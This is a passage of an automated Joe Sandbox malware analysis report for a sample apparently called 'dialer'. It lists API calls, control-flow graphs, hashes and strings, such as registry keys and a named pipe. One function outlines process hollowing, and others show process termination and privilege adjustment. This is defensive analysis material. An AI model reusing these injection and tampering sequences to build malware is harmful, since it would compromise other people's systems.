                                                                • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                                • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                                • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                                • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                                • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                                • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                                • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                                • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                                • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                                • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                                • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                                • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                              • OpenProcess.KERNEL32 ref: 0000000140001859
                                                              • TerminateProcess.KERNELBASE ref: 000000014000186C
                                                              • CloseHandle.KERNEL32 ref: 0000000140001875
                                                              • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                              • String ID:
                                                              • API String ID: 1323846700-0
                                                              • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                              • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                              • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                              • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                              Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 173 1400018ac-1400018d6 OpenProcess 174 140001901-140001912 173->174 175 1400018d8-1400018e8 IsWow64Process 173->175 176 1400018f8-1400018fb CloseHandle 175->176 177 1400018ea-1400018f3 175->177 176->174 177->176
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseHandleOpenWow64
                                                              • String ID:
                                                              • API String ID: 10462204-0
                                                              • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                              • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                              • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                              • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                              Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 178 140002258-14000225c call 14000226c 180 140002261-140002263 ExitProcess 178->180
                                                              APIs
                                                                • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                              • ExitProcess.KERNEL32 ref: 0000000140002263
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                              • String ID:
                                                              • API String ID: 3836936051-0
                                                              • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                              • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                              • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                              • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                              Non-executed Functions

                                                              Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 189 140002560-14000258c 190 140002592 189->190 191 14000273a-140002742 189->191 192 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 190->192 193 140002598-14000259f 190->193 194 140002748-14000274b 191->194 195 14000297e-1400029a2 ReadFile 191->195 196 140002a74-140002a8e 192->196 198 140002704-140002715 192->198 199 1400025a5-1400025a8 193->199 200 1400026bd-1400026bf ExitProcess 193->200 201 140002751-140002756 194->201 202 140002974-140002979 call 14000175c 194->202 195->196 197 1400029a8-1400029af 195->197 197->196 206 1400029b5-1400029c9 call 1400018ac 197->206 198->196 207 14000271b-140002733 call 1400010c0 198->207 208 1400025ae-1400025b1 199->208 209 140002660-14000268b RegOpenKeyExW 199->209 203 140002919-14000292c call 140001944 201->203 204 14000275c-14000275f 201->204 202->196 203->196 231 140002932-140002941 call 140001944 203->231 210 140002761-140002766 204->210 211 14000279d-1400027ae call 140001944 204->211 206->196 229 1400029cf-1400029d5 206->229 232 140002735 207->232 218 140002651-14000265b 208->218 219 1400025b7-1400025ba 208->219 216 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 209->216 217 14000268d-14000269b RegDeleteValueW 209->217 210->196 220 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 210->220 211->196 240 1400027b4-1400027d6 ReadFile 211->240 216->196 217->216 218->196 226 140002644-14000264c 219->226 227 1400025c0-1400025c5 219->227 226->196 227->196 234 1400025cb-1400025ef ReadFile 227->234 238 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 229->238 239 140002a5f 229->239 231->196 255 140002947-14000296f ShellExecuteW 231->255 232->196 234->196 236 1400025f5-1400025fc 234->236 236->196 243 140002602-140002616 call 1400018ac 236->243 258 140002a18-140002a1e 238->258 259 140002a49-140002a4f GetProcessHeap 238->259 245 140002a66-140002a6f call 140002a90 239->245 240->196 247 1400027dc-1400027e3 240->247 243->196 264 14000261c-140002622 243->264 245->196 247->196 254 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 247->254 260 14000290b-140002914 GetProcessHeap 254->260 261 14000282d-140002839 254->261 255->196 258->259 265 140002a20-140002a32 258->265 262 140002a52-140002a5d HeapFree 259->262 260->262 261->260 266 14000283f-14000284b 261->266 262->196 268 140002624-140002633 call 1400010c0 264->268 269 140002638-14000263f 264->269 270 140002a34-140002a36 265->270 271 140002a38-140002a40 265->271 266->260 272 140002851-14000285c 266->272 268->196 269->245 270->271 276 140002a44 call 1400016cc 270->276 271->259 277 140002a42 271->277 273 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 272->273 274 14000285e-140002869 272->274 273->260 274->260 278 14000286f-14000287c call 140001c88 274->278 276->259 277->265 278->260
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                              • String ID: SOFTWARE$dialerstager$open
                                                              • API String ID: 3276259517-3931493855
                                                              • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                              • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                              • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                              • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                              Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 285 140001c88-140001cb8 286 140001cbb-140001cc8 285->286 287 140001e8c-140001e91 286->287 288 140001cce-140001d25 CreateProcessW 286->288 287->286 291 140001e97 287->291 289 140001e88 288->289 290 140001d2b-140001d5a VirtualAllocEx 288->290 289->287 292 140001e5d-140001e60 290->292 293 140001d60-140001d7b WriteProcessMemory 290->293 294 140001e99-140001eb9 291->294 295 140001e62-140001e76 OpenProcess 292->295 296 140001e85 292->296 293->292 297 140001d81-140001d87 293->297 295->289 298 140001e78-140001e83 TerminateProcess 295->298 296->289 299 140001dd2-140001def VirtualAlloc 297->299 300 140001d89 297->300 298->289 299->292 301 140001df1-140001e07 GetThreadContext 299->301 302 140001d8c-140001dba WriteProcessMemory 300->302 301->292 304 140001e09-140001e2e WriteProcessMemory 301->304 302->292 303 140001dc0-140001dcc 302->303 303->302 305 140001dce 303->305 304->292 306 140001e30-140001e4c SetThreadContext 304->306 305->299 306->292 307 140001e4e-140001e5b ResumeThread 306->307 307->292 308 140001eba-140001ebf 307->308 308->294
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                              • String ID: @
                                                              • API String ID: 3462610200-2766056989
                                                              • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                              • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                              • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                              • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                              Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                              • String ID: dialersvc64
                                                              • API String ID: 4184240511-3881820561
                                                              • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                              • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                              • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                              • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                              Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Delete$CloseEnumOpen
                                                              • String ID: SOFTWARE\dialerconfig
                                                              • API String ID: 3013565938-461861421
                                                              • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                              • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                              • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                              • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                              Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: File$Write$CloseCreateHandle
                                                              • String ID: \\.\pipe\dialercontrol_redirect64
                                                              • API String ID: 148219782-3440882674
                                                              • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                              • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                              • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                              • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                              Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000003E.00000002.3066924341.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 0000003E.00000002.3066724142.0000000140000000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067086574.0000000140003000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000003E.00000002.3067233456.0000000140006000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_62_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: ntdll.dll
                                                              • API String ID: 1646373207-2227199552
                                                              • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                              • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                              • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                              • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                              Execution Graph

                                                              Execution Coverage:2.2%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:899
                                                              Total number of Limit Nodes:2
                                                              execution_graph 2988 140001ac3 2989 140001a70 2988->2989 2990 14000199e 2989->2990 2991 140001b36 2989->2991 2994 140001b53 2989->2994 2993 140001a0f 2990->2993 2995 1400019e9 VirtualProtect 2990->2995 2992 140001ba0 4 API calls 2991->2992 2992->2994 2995->2990 2090 140001ae4 2091 140001a70 2090->2091 2092 14000199e 2091->2092 2093 140001b36 2091->2093 2096 140001b53 2091->2096 2095 140001a0f 2092->2095 2097 1400019e9 VirtualProtect 2092->2097 2098 140001ba0 2093->2098 2097->2092 2099 140001bc2 2098->2099 2101 140001c45 VirtualQuery 2099->2101 2102 140001cf4 2099->2102 2105 140001c04 memcpy 2099->2105 2101->2102 2107 140001c72 2101->2107 2103 140001d23 GetLastError 2102->2103 2104 140001d37 2103->2104 2105->2096 2106 140001ca4 VirtualProtect 2106->2103 2106->2105 2107->2105 2107->2106 2135 140001404 2208 140001394 2135->2208 2137 140001413 2138 140001394 2 API calls 2137->2138 2139 140001422 2138->2139 2140 140001394 2 API calls 2139->2140 2141 140001431 2140->2141 2142 140001394 2 API calls 2141->2142 2143 140001440 2142->2143 2144 140001394 2 API calls 2143->2144 2145 14000144f 2144->2145 2146 140001394 2 API calls 2145->2146 2147 14000145e 2146->2147 2148 140001394 2 API calls 2147->2148 2149 14000146d 2148->2149 2150 140001394 2 API calls 2149->2150 2151 14000147c 2150->2151 2152 140001394 2 API calls 2151->2152 2153 14000148b 2152->2153 2154 140001394 2 API calls 2153->2154 2155 14000149a 2154->2155 2156 140001394 2 API calls 2155->2156 2157 1400014a9 2156->2157 2158 140001394 2 API calls 2157->2158 2159 1400014b8 2158->2159 2160 140001394 2 API calls 2159->2160 2161 1400014c7 2160->2161 2162 140001394 2 API calls 2161->2162 2163 1400014d6 2162->2163 2164 1400014e5 2163->2164 2165 140001394 2 API calls 2163->2165 2166 140001394 2 API calls 2164->2166 2165->2164 2167 1400014ef 2166->2167 2168 1400014f4 2167->2168 2169 140001394 2 API calls 2167->2169 2170 140001394 2 API calls 2168->2170 2169->2168 2171 1400014fe 2170->2171 2172 140001503 2171->2172 2173 140001394 2 API calls 2171->2173 2174 140001394 2 API calls 2172->2174 2173->2172 2175 14000150d 2174->2175 2176 140001394 2 API calls 2175->2176 2177 140001512 2176->2177 2178 140001394 2 API calls 2177->2178 2179 140001521 2178->2179 2180 140001394 2 API calls 2179->2180 2181 140001530 2180->2181 2182 140001394 2 API calls 2181->2182 2183 14000153f 2182->2183 2184 140001394 2 API calls 2183->2184 2185 14000154e 2184->2185 2186 140001394 2 API calls 2185->2186 2187 14000155d 2186->2187 2188 140001394 2 API calls 2187->2188 2189 14000156c 2188->2189 2190 140001394 2 API calls 2189->2190 2191 14000157b 2190->2191 2192 140001394 2 API calls 2191->2192 2193 14000158a 2192->2193 2194 140001394 2 API calls 2193->2194 2195 140001599 2194->2195 2196 140001394 2 API calls 2195->2196 2197 1400015a8 2196->2197 2198 140001394 2 API calls 2197->2198 2199 1400015b7 2198->2199 2200 140001394 2 API calls 2199->2200 2201 1400015c6 2200->2201 2202 140001394 2 API calls 2201->2202 2203 1400015d5 2202->2203 2204 140001394 2 API calls 2203->2204 2205 1400015e4 2204->2205 2206 140001394 2 API calls 2205->2206 2207 1400015f3 2206->2207 2209 140006670 malloc 2208->2209 2210 1400013b8 2209->2210 2211 1400013c6 NtResetWriteWatch 2210->2211 2211->2137 2212 140002104 2213 140002111 EnterCriticalSection 2212->2213 2218 140002218 2212->2218 2214 14000220b LeaveCriticalSection 2213->2214 2220 14000212e 2213->2220 2214->2218 2215 140002272 2216 14000214d TlsGetValue GetLastError 2216->2220 2217 140002241 DeleteCriticalSection 2217->2215 2218->2215 2218->2217 2219 140002230 free 2218->2219 2219->2217 2219->2219 2220->2214 2220->2216 2108 140001e65 2109 140001e67 signal 2108->2109 2110 140001e7c 2109->2110 2112 140001e99 2109->2112 2111 140001e82 signal 2110->2111 2110->2112 2111->2112 2996 140001f47 2997 140001e67 signal 2996->2997 2998 140001e99 2996->2998 2997->2998 2999 140001e7c 2997->2999 2999->2998 3000 140001e82 signal 2999->3000 3000->2998 2113 14000216f 2114 140002185 2113->2114 2115 140002178 InitializeCriticalSection 2113->2115 2115->2114 2116 140001a70 2117 14000199e 2116->2117 2121 140001a7d 2116->2121 2118 140001a0f 2117->2118 2119 1400019e9 VirtualProtect 2117->2119 2119->2117 2120 140001b53 2121->2116 2121->2120 2122 140001b36 2121->2122 2123 140001ba0 4 API calls 2122->2123 2123->2120 2221 140001e10 2222 140001e2f 2221->2222 2223 140001ecc 2222->2223 2227 140001eb5 2222->2227 2228 140001e55 2222->2228 2224 140001ed3 signal 2223->2224 2223->2227 2225 140001ee4 2224->2225 2224->2227 2226 140001eea signal 2225->2226 2225->2227 2226->2227 2228->2227 2229 140001f12 signal 2228->2229 2229->2227 3001 140002050 3002 14000205e EnterCriticalSection 3001->3002 3003 1400020cf 3001->3003 3004 1400020c2 LeaveCriticalSection 3002->3004 3005 140002079 3002->3005 3004->3003 3005->3004 3006 1400020bd free 3005->3006 3006->3004 3007 140001fd0 3008 140001fe4 3007->3008 3009 140002033 3007->3009 3008->3009 3010 140001ffd EnterCriticalSection LeaveCriticalSection 3008->3010 3010->3009 2238 140001ab3 2239 140001a70 2238->2239 2239->2238 2240 140001b36 2239->2240 2242 14000199e 2239->2242 2245 140001b53 2239->2245 2241 140001ba0 4 API calls 2240->2241 2241->2245 2243 140001a0f 2242->2243 2244 1400019e9 VirtualProtect 2242->2244 2244->2242 2080 140001394 2084 140006670 2080->2084 2082 1400013b8 2083 1400013c6 NtResetWriteWatch 2082->2083 2085 14000668e 2084->2085 2088 1400066bb 2084->2088 2085->2082 2086 140006763 2087 14000677f malloc 2086->2087 2089 1400067a0 2087->2089 2088->2085 2088->2086 2089->2085 2230 14000219e 2231 140002272 2230->2231 2232 1400021ab EnterCriticalSection 2230->2232 2233 140002265 LeaveCriticalSection 2232->2233 2235 1400021c8 2232->2235 2233->2231 2234 1400021e9 TlsGetValue GetLastError 2234->2235 2235->2233 2235->2234 2124 140001800 2125 140001812 2124->2125 2126 140001835 fprintf 2125->2126 2127 140001000 2128 14000108b __set_app_type 2127->2128 2129 140001040 2127->2129 2131 1400010b6 2128->2131 2129->2128 2130 1400010e5 2131->2130 2133 140001e00 2131->2133 2134 140006c10 __setusermatherr 2133->2134 2236 140002320 strlen 2237 140002337 2236->2237 2246 140001140 2249 140001160 2246->2249 2248 140001156 2250 1400011b9 2249->2250 2251 14000118b 2249->2251 2252 1400011d3 2250->2252 2253 1400011c7 _amsg_exit 2250->2253 2251->2250 2254 1400011a0 Sleep 2251->2254 2255 140001201 _initterm 2252->2255 2256 14000121a 2252->2256 2253->2252 2254->2250 2254->2251 2255->2256 2272 140001880 2256->2272 2259 14000126a 2260 14000126f malloc 2259->2260 2261 14000128b 2260->2261 2263 1400012d0 2260->2263 2262 1400012a0 strlen malloc memcpy 2261->2262 2262->2262 2262->2263 2283 140003250 2263->2283 2265 140001315 2266 140001344 2265->2266 2267 140001324 2265->2267 2270 140001160 78 API calls 2266->2270 2268 140001338 2267->2268 2269 14000132d _cexit 2267->2269 2268->2248 2269->2268 2271 140001366 2270->2271 2271->2248 2273 140001247 SetUnhandledExceptionFilter 2272->2273 2274 1400018a2 2272->2274 2273->2259 2274->2273 2275 14000194d 2274->2275 2279 140001a20 2274->2279 2276 14000199e 2275->2276 2277 140001ba0 4 API calls 2275->2277 2276->2273 2278 1400019e9 VirtualProtect 2276->2278 2277->2275 2278->2276 2279->2276 2280 140001b53 2279->2280 2281 140001b36 2279->2281 2282 140001ba0 4 API calls 2281->2282 2282->2280 2286 140003266 2283->2286 2284 1400033c1 wcslen 2395 14000153f 2284->2395 2286->2284 2288 1400035be 2288->2265 2291 1400034bc 2294 1400034e2 memset 2291->2294 2297 140003514 2294->2297 2296 140003564 wcslen 2298 14000357a 2296->2298 2302 1400035bc 2296->2302 2297->2296 2299 140003590 _wcsnicmp 2298->2299 2300 1400035a6 wcslen 2299->2300 2299->2302 2300->2299 2300->2302 2301 140003681 wcscpy wcscat memset 2304 1400036c0 2301->2304 2302->2301 2303 140003703 wcscpy wcscat memset 2305 140003746 2303->2305 2304->2303 2306 14000384e wcscpy wcscat memset 2305->2306 2307 140003890 2306->2307 2308 140003be5 wcslen 2307->2308 2309 140003bf3 2308->2309 2313 140003c2b 2308->2313 2310 140003c00 _wcsnicmp 2309->2310 2311 140003c16 wcslen 2310->2311 2310->2313 2311->2310 2311->2313 2312 140003ce2 wcscpy wcscat memset 2315 140003d24 2312->2315 2313->2312 2314 140003d67 wcscpy wcscat memset 2316 140003dad 2314->2316 2315->2314 2317 140003ddd wcscpy wcscat 2316->2317 2318 1400061b3 memcpy 2317->2318 2320 140003e0f 2317->2320 2318->2320 2319 140003f62 wcslen 2322 140003fa7 2319->2322 2320->2319 2321 14000400c 